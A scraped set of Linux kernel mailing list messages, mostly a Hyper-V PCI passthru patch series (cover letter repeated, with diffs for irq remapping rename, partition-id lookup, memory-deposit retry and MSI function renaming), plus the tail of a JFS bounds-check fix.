DTPAGEMAXSLOT) { + if (stbl[0] < 0 || (unsigned char)stbl[0] >= DTPAGEMAXSLOT) { DT_PUTPAGE(mp); jfs_error(ip->i_sb, "stbl[0] out of bound\n"); return -EIO; -- 2.39.5
On 2/2/26 3:49AM, Arnd Bergmann wrote: I think it would be better to just drop the useless part of these tests. Shaggy
{ "author": "Dave Kleikamp <dave.kleikamp@oracle.com>", "date": "Mon, 2 Feb 2026 11:34:34 -0600", "thread_id": "fd1854c2-d3f1-4901-8b7d-c6ce944caf61@oracle.com.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> This file actually implements irq remapping, so rename to more appropriate hyperv-irq.c. A new file named hyperv-iommu.c will be introduced later. Also, move CONFIG_IRQ_REMAP out of the file and add to Makefile. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- MAINTAINERS | 2 +- drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/{hyperv-iommu.c => hyperv-irq.c} | 4 ---- 4 files changed, 3 insertions(+), 6 deletions(-) rename drivers/iommu/{hyperv-iommu.c => hyperv-irq.c} (99%) diff --git a/MAINTAINERS b/MAINTAINERS index 5b11839cba9d..381a0e086382 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -11741,7 +11741,7 @@ F: drivers/hid/hid-hyperv.c F: drivers/hv/ F: drivers/infiniband/hw/mana/ F: drivers/input/serio/hyperv-keyboard.c -F: drivers/iommu/hyperv-iommu.c +F: drivers/iommu/hyperv-irq.c F: drivers/net/ethernet/microsoft/ F: drivers/net/hyperv/ F: drivers/pci/controller/pci-hyperv-intf.c diff --git a/drivers/iommu/Kconfig b/drivers/iommu/Kconfig index 99095645134f..b4cc2b42b338 100644 --- a/drivers/iommu/Kconfig +++ b/drivers/iommu/Kconfig @@ -355,6 +355,7 @@ config HYPERV_IOMMU bool "Hyper-V IRQ Handling" depends on HYPERV && X86 select IOMMU_API + select IRQ_REMAP default HYPERV help Stub IOMMU driver to handle IRQs to support Hyper-V Linux diff --git a/drivers/iommu/Makefile b/drivers/iommu/Makefile index 8e8843316c4b..598c39558e7d 100644 --- a/drivers/iommu/Makefile +++ b/drivers/iommu/Makefile @@ -30,7 +30,7 @@ obj-$(CONFIG_TEGRA_IOMMU_SMMU) += tegra-smmu.o obj-$(CONFIG_EXYNOS_IOMMU) += exynos-iommu.o obj-$(CONFIG_FSL_PAMU) += fsl_pamu.o fsl_pamu_domain.o obj-$(CONFIG_S390_IOMMU) += s390-iommu.o -obj-$(CONFIG_HYPERV_IOMMU) += hyperv-iommu.o +obj-$(CONFIG_HYPERV_IOMMU) += hyperv-irq.o obj-$(CONFIG_VIRTIO_IOMMU) += virtio-iommu.o obj-$(CONFIG_IOMMU_SVA) += iommu-sva.o obj-$(CONFIG_IOMMU_IOPF) += io-pgfault.o diff --git a/drivers/iommu/hyperv-iommu.c b/drivers/iommu/hyperv-irq.c similarity index 99% rename from drivers/iommu/hyperv-iommu.c rename to drivers/iommu/hyperv-irq.c index 0961ac805944..1944440a5004 100644 --- a/drivers/iommu/hyperv-iommu.c +++ b/drivers/iommu/hyperv-irq.c @@ -24,8 +24,6 @@ #include "irq_remapping.h" -#ifdef CONFIG_IRQ_REMAP - /* * According 82093AA IO-APIC spec , IO APIC has a 24-entry Interrupt * Redirection Table. Hyper-V exposes one single IO-APIC and so define @@ -330,5 +328,3 @@ static const struct irq_domain_ops hyperv_root_ir_domain_ops = { .alloc = hyperv_root_irq_remapping_alloc, .free = hyperv_root_irq_remapping_free, }; - -#endif -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:16 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Many PCI passthru related hypercalls require partition id of the target guest. Guests are actually managed by MSHV driver and the partition id is only maintained there. Add a field in the partition struct in MSHV driver to save the tgid of the VMM process creating the partition, and add a function there to retrieve partition id if valid VMM tgid. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root.h | 1 + drivers/hv/mshv_root_main.c | 35 +++++++++++++++++++++++++++------- include/asm-generic/mshyperv.h | 1 + 3 files changed, 30 insertions(+), 7 deletions(-) diff --git a/drivers/hv/mshv_root.h b/drivers/hv/mshv_root.h index 3c1d88b36741..c3753b009fd8 100644 --- a/drivers/hv/mshv_root.h +++ b/drivers/hv/mshv_root.h @@ -134,6 +134,7 @@ struct mshv_partition { struct mshv_girq_routing_table __rcu *pt_girq_tbl; u64 isolation_type; + pid_t pt_vmm_tgid; bool import_completed; bool pt_initialized; }; diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 1134a82c7881..83c7bad269a0 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -1823,6 +1823,20 @@ mshv_partition_release(struct inode *inode, struct file *filp) return 0; } +/* Given a process tgid, return partition id if it is a VMM process */ +u64 mshv_pid_to_partid(pid_t tgid) +{ + struct mshv_partition *pt; + int i; + + hash_for_each_rcu(mshv_root.pt_htable, i, pt, pt_hnode) + if (pt->pt_vmm_tgid == tgid) + return pt->pt_id; + + return HV_PARTITION_ID_INVALID; +} +EXPORT_SYMBOL_GPL(mshv_pid_to_partid); + static int add_partition(struct mshv_partition *partition) { @@ -1987,13 +2001,20 @@ mshv_ioctl_create_partition(void __user *user_arg, struct device *module_dev) goto delete_partition; ret = mshv_init_async_handler(partition); - if (!ret) { - ret = FD_ADD(O_CLOEXEC, anon_inode_getfile("mshv_partition", - &mshv_partition_fops, - partition, O_RDWR)); - if (ret >= 0) - return ret; - } + if (ret) + goto rem_partition; + + ret = FD_ADD(O_CLOEXEC, anon_inode_getfile("mshv_partition", + &mshv_partition_fops, + partition, O_RDWR)); + if (ret < 0) + goto rem_partition; + + partition->pt_vmm_tgid = current->tgid; + + return ret; + +rem_partition: remove_partition(partition); delete_partition: hv_call_delete_partition(partition->pt_id); diff --git a/include/asm-generic/mshyperv.h b/include/asm-generic/mshyperv.h index ecedab554c80..e46a38916e76 100644 --- a/include/asm-generic/mshyperv.h +++ b/include/asm-generic/mshyperv.h @@ -211,6 +211,7 @@ void __init ms_hyperv_late_init(void); int hv_common_cpu_init(unsigned int cpu); int hv_common_cpu_die(unsigned int cpu); void hv_identify_partition_type(void); +u64 mshv_pid_to_partid(pid_t tgid); /** * hv_cpu_number_to_vp_number() - Map CPU to VP. -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:19 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Passthru exposes insufficient memory hypercall failure in the current map device interrupt hypercall. In case of such a failure, we must deposit more memory and redo the hypercall. Add support for that. Deposit memory needs partition id, make that a parameter to the map interrupt function. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/hyperv/irqdomain.c | 38 +++++++++++++++++++++++++++++++------ 1 file changed, 32 insertions(+), 6 deletions(-) diff --git a/arch/x86/hyperv/irqdomain.c b/arch/x86/hyperv/irqdomain.c index f6b61483b3b8..ccbe5848a28f 100644 --- a/arch/x86/hyperv/irqdomain.c +++ b/arch/x86/hyperv/irqdomain.c @@ -13,8 +13,9 @@ #include <linux/irqchip/irq-msi-lib.h> #include <asm/mshyperv.h> -static int hv_map_interrupt(union hv_device_id hv_devid, bool level, - int cpu, int vector, struct hv_interrupt_entry *ret_entry) +static u64 hv_map_interrupt_hcall(u64 ptid, union hv_device_id hv_devid, + bool level, int cpu, int vector, + struct hv_interrupt_entry *ret_entry) { struct hv_input_map_device_interrupt *input; struct hv_output_map_device_interrupt *output; @@ -30,8 +31,10 @@ static int hv_map_interrupt(union hv_device_id hv_devid, bool level, intr_desc = &input->interrupt_descriptor; memset(input, 0, sizeof(*input)); - input->partition_id = hv_current_partition_id; + + input->partition_id = ptid; input->device_id = hv_devid.as_uint64; + intr_desc->interrupt_type = HV_X64_INTERRUPT_TYPE_FIXED; intr_desc->vector_count = 1; intr_desc->target.vector = vector; @@ -64,6 +67,28 @@ static int hv_map_interrupt(union hv_device_id hv_devid, bool level, local_irq_restore(flags); + return status; +} + +static int hv_map_interrupt(u64 ptid, union hv_device_id device_id, bool level, + int cpu, int vector, + struct hv_interrupt_entry *ret_entry) +{ + u64 status; + int rc, deposit_pgs = 16; /* don't loop forever */ + + while (deposit_pgs--) { + status = hv_map_interrupt_hcall(ptid, device_id, level, cpu, + vector, ret_entry); + + if (hv_result(status) != HV_STATUS_INSUFFICIENT_MEMORY) + break; + + rc = hv_call_deposit_pages(NUMA_NO_NODE, ptid, 1); + if (rc) + break; + }; + if (!hv_result_success(status)) hv_status_err(status, "\n"); @@ -199,8 +224,8 @@ int hv_map_msi_interrupt(struct irq_data *data, hv_devid = hv_build_devid_type_pci(pdev); cpu = cpumask_first(irq_data_get_effective_affinity_mask(data)); - return hv_map_interrupt(hv_devid, false, cpu, cfg->vector, - out_entry ? out_entry : &dummy); + return hv_map_interrupt(hv_current_partition_id, hv_devid, false, cpu, + cfg->vector, out_entry ? out_entry : &dummy); } EXPORT_SYMBOL_GPL(hv_map_msi_interrupt); @@ -422,6 +447,7 @@ int hv_map_ioapic_interrupt(int ioapic_id, bool level, int cpu, int vector, hv_devid.device_type = HV_DEVICE_TYPE_IOAPIC; hv_devid.ioapic.ioapic_id = (u8)ioapic_id; - return hv_map_interrupt(hv_devid, level, cpu, vector, entry); + return hv_map_interrupt(hv_current_partition_id, hv_devid, level, cpu, + vector, entry); } EXPORT_SYMBOL_GPL(hv_map_ioapic_interrupt); -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:18 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Main change here is to rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg as we introduce hv_compose_msi_msg in upcoming patches that builds MSI messages for both VMBus and non-VMBus cases. VMBus is not used on baremetal root partition for example. While at it, replace spaces with tabs and fix some formatting involving excessive line wraps. There is no functional change. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/pci/controller/pci-hyperv.c | 95 +++++++++++++++-------------- 1 file changed, 48 insertions(+), 47 deletions(-) diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c index 1e237d3538f9..8bc6a38c9b5a 100644 --- a/drivers/pci/controller/pci-hyperv.c +++ b/drivers/pci/controller/pci-hyperv.c @@ -30,7 +30,7 @@ * function's configuration space is zero. * * The rest of this driver mostly maps PCI concepts onto underlying Hyper-V - * facilities. For instance, the configuration space of a function exposed + * facilities. For instance, the configuration space of a function exposed * by Hyper-V is mapped into a single page of memory space, and the * read and write handlers for config space must be aware of this mechanism. * Similarly, device setup and teardown involves messages sent to and from @@ -109,33 +109,33 @@ enum pci_message_type { /* * Version 1.1 */ - PCI_MESSAGE_BASE = 0x42490000, - PCI_BUS_RELATIONS = PCI_MESSAGE_BASE + 0, - PCI_QUERY_BUS_RELATIONS = PCI_MESSAGE_BASE + 1, - PCI_POWER_STATE_CHANGE = PCI_MESSAGE_BASE + 4, + PCI_MESSAGE_BASE = 0x42490000, + PCI_BUS_RELATIONS = PCI_MESSAGE_BASE + 0, + PCI_QUERY_BUS_RELATIONS = PCI_MESSAGE_BASE + 1, + PCI_POWER_STATE_CHANGE = PCI_MESSAGE_BASE + 4, PCI_QUERY_RESOURCE_REQUIREMENTS = PCI_MESSAGE_BASE + 5, - PCI_QUERY_RESOURCE_RESOURCES = PCI_MESSAGE_BASE + 6, - PCI_BUS_D0ENTRY = PCI_MESSAGE_BASE + 7, - PCI_BUS_D0EXIT = PCI_MESSAGE_BASE + 8, - PCI_READ_BLOCK = PCI_MESSAGE_BASE + 9, - PCI_WRITE_BLOCK = PCI_MESSAGE_BASE + 0xA, - PCI_EJECT = PCI_MESSAGE_BASE + 0xB, - PCI_QUERY_STOP = PCI_MESSAGE_BASE + 0xC, - PCI_REENABLE = PCI_MESSAGE_BASE + 0xD, - PCI_QUERY_STOP_FAILED = PCI_MESSAGE_BASE + 0xE, - PCI_EJECTION_COMPLETE = PCI_MESSAGE_BASE + 0xF, - PCI_RESOURCES_ASSIGNED = PCI_MESSAGE_BASE + 0x10, - PCI_RESOURCES_RELEASED = PCI_MESSAGE_BASE + 0x11, - PCI_INVALIDATE_BLOCK = PCI_MESSAGE_BASE + 0x12, - PCI_QUERY_PROTOCOL_VERSION = PCI_MESSAGE_BASE + 0x13, - PCI_CREATE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x14, - PCI_DELETE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x15, + PCI_QUERY_RESOURCE_RESOURCES = PCI_MESSAGE_BASE + 6, + PCI_BUS_D0ENTRY = PCI_MESSAGE_BASE + 7, + PCI_BUS_D0EXIT = PCI_MESSAGE_BASE + 8, + PCI_READ_BLOCK = PCI_MESSAGE_BASE + 9, + PCI_WRITE_BLOCK = PCI_MESSAGE_BASE + 0xA, + PCI_EJECT = PCI_MESSAGE_BASE + 0xB, + PCI_QUERY_STOP = PCI_MESSAGE_BASE + 0xC, + PCI_REENABLE = PCI_MESSAGE_BASE + 0xD, + PCI_QUERY_STOP_FAILED = PCI_MESSAGE_BASE + 0xE, + PCI_EJECTION_COMPLETE = PCI_MESSAGE_BASE + 0xF, + PCI_RESOURCES_ASSIGNED = PCI_MESSAGE_BASE + 0x10, + PCI_RESOURCES_RELEASED = PCI_MESSAGE_BASE + 0x11, + PCI_INVALIDATE_BLOCK = PCI_MESSAGE_BASE + 0x12, + PCI_QUERY_PROTOCOL_VERSION = PCI_MESSAGE_BASE + 0x13, + PCI_CREATE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x14, + PCI_DELETE_INTERRUPT_MESSAGE = PCI_MESSAGE_BASE + 0x15, PCI_RESOURCES_ASSIGNED2 = PCI_MESSAGE_BASE + 0x16, PCI_CREATE_INTERRUPT_MESSAGE2 = PCI_MESSAGE_BASE + 0x17, PCI_DELETE_INTERRUPT_MESSAGE2 = PCI_MESSAGE_BASE + 0x18, /* unused */ PCI_BUS_RELATIONS2 = PCI_MESSAGE_BASE + 0x19, - PCI_RESOURCES_ASSIGNED3 = PCI_MESSAGE_BASE + 0x1A, - PCI_CREATE_INTERRUPT_MESSAGE3 = PCI_MESSAGE_BASE + 0x1B, + PCI_RESOURCES_ASSIGNED3 = PCI_MESSAGE_BASE + 0x1A, + PCI_CREATE_INTERRUPT_MESSAGE3 = PCI_MESSAGE_BASE + 0x1B, PCI_MESSAGE_MAXIMUM }; @@ -1775,20 +1775,21 @@ static u32 hv_compose_msi_req_v1( * via the HVCALL_RETARGET_INTERRUPT hypercall. But the choice of dummy vCPU is * not irrelevant because Hyper-V chooses the physical CPU to handle the * interrupts based on the vCPU specified in message sent to the vPCI VSP in - * hv_compose_msi_msg(). Hyper-V's choice of pCPU is not visible to the guest, - * but assigning too many vPCI device interrupts to the same pCPU can cause a - * performance bottleneck. So we spread out the dummy vCPUs to influence Hyper-V - * to spread out the pCPUs that it selects. + * hv_vmbus_compose_msi_msg(). Hyper-V's choice of pCPU is not visible to the + * guest, but assigning too many vPCI device interrupts to the same pCPU can + * cause a performance bottleneck. So we spread out the dummy vCPUs to influence + * Hyper-V to spread out the pCPUs that it selects. * * For the single-MSI and MSI-X cases, it's OK for hv_compose_msi_req_get_cpu() * to always return the same dummy vCPU, because a second call to - * hv_compose_msi_msg() contains the "real" vCPU, causing Hyper-V to choose a - * new pCPU for the interrupt. But for the multi-MSI case, the second call to - * hv_compose_msi_msg() exits without sending a message to the vPCI VSP, so the - * original dummy vCPU is used. This dummy vCPU must be round-robin'ed so that - * the pCPUs are spread out. All interrupts for a multi-MSI device end up using - * the same pCPU, even though the vCPUs will be spread out by later calls - * to hv_irq_unmask(), but that is the best we can do now. + * hv_vmbus_compose_msi_msg() contains the "real" vCPU, causing Hyper-V to + * choose a new pCPU for the interrupt. But for the multi-MSI case, the second + * call to hv_vmbus_compose_msi_msg() exits without sending a message to the + * vPCI VSP, so the original dummy vCPU is used. This dummy vCPU must be + * round-robin'ed so that the pCPUs are spread out. All interrupts for a + * multi-MSI device end up using the same pCPU, even though the vCPUs will be + * spread out by later calls to hv_irq_unmask(), but that is the best we can do + * now. * * With Hyper-V in Nov 2022, the HVCALL_RETARGET_INTERRUPT hypercall does *not* * cause Hyper-V to reselect the pCPU based on the specified vCPU. Such an @@ -1863,7 +1864,7 @@ static u32 hv_compose_msi_req_v3( } /** - * hv_compose_msi_msg() - Supplies a valid MSI address/data + * hv_vmbus_compose_msi_msg() - Supplies a valid MSI address/data * @data: Everything about this MSI * @msg: Buffer that is filled in by this function * @@ -1873,7 +1874,7 @@ static u32 hv_compose_msi_req_v3( * response supplies a data value and address to which that data * should be written to trigger that interrupt. */ -static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) +static void hv_vmbus_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) { struct hv_pcibus_device *hbus; struct vmbus_channel *channel; @@ -1955,7 +1956,7 @@ static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) return; } /* - * The vector we select here is a dummy value. The correct + * The vector we select here is a dummy value. The correct * value gets sent to the hypervisor in unmask(). This needs * to be aligned with the count, and also not zero. Multi-msi * is powers of 2 up to 32, so 32 will always work here. @@ -2047,7 +2048,7 @@ static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg) /* * Make sure that the ring buffer data structure doesn't get - * freed while we dereference the ring buffer pointer. Test + * freed while we dereference the ring buffer pointer. Test * for the channel's onchannel_callback being NULL within a * sched_lock critical section. See also the inline comments * in vmbus_reset_channel_cb(). @@ -2147,7 +2148,7 @@ static const struct msi_parent_ops hv_pcie_msi_parent_ops = { /* HW Interrupt Chip Descriptor */ static struct irq_chip hv_msi_irq_chip = { .name = "Hyper-V PCIe MSI", - .irq_compose_msi_msg = hv_compose_msi_msg, + .irq_compose_msi_msg = hv_vmbus_compose_msi_msg, .irq_set_affinity = irq_chip_set_affinity_parent, .irq_ack = irq_chip_ack_parent, .irq_eoi = irq_chip_eoi_parent, @@ -2159,8 +2160,8 @@ 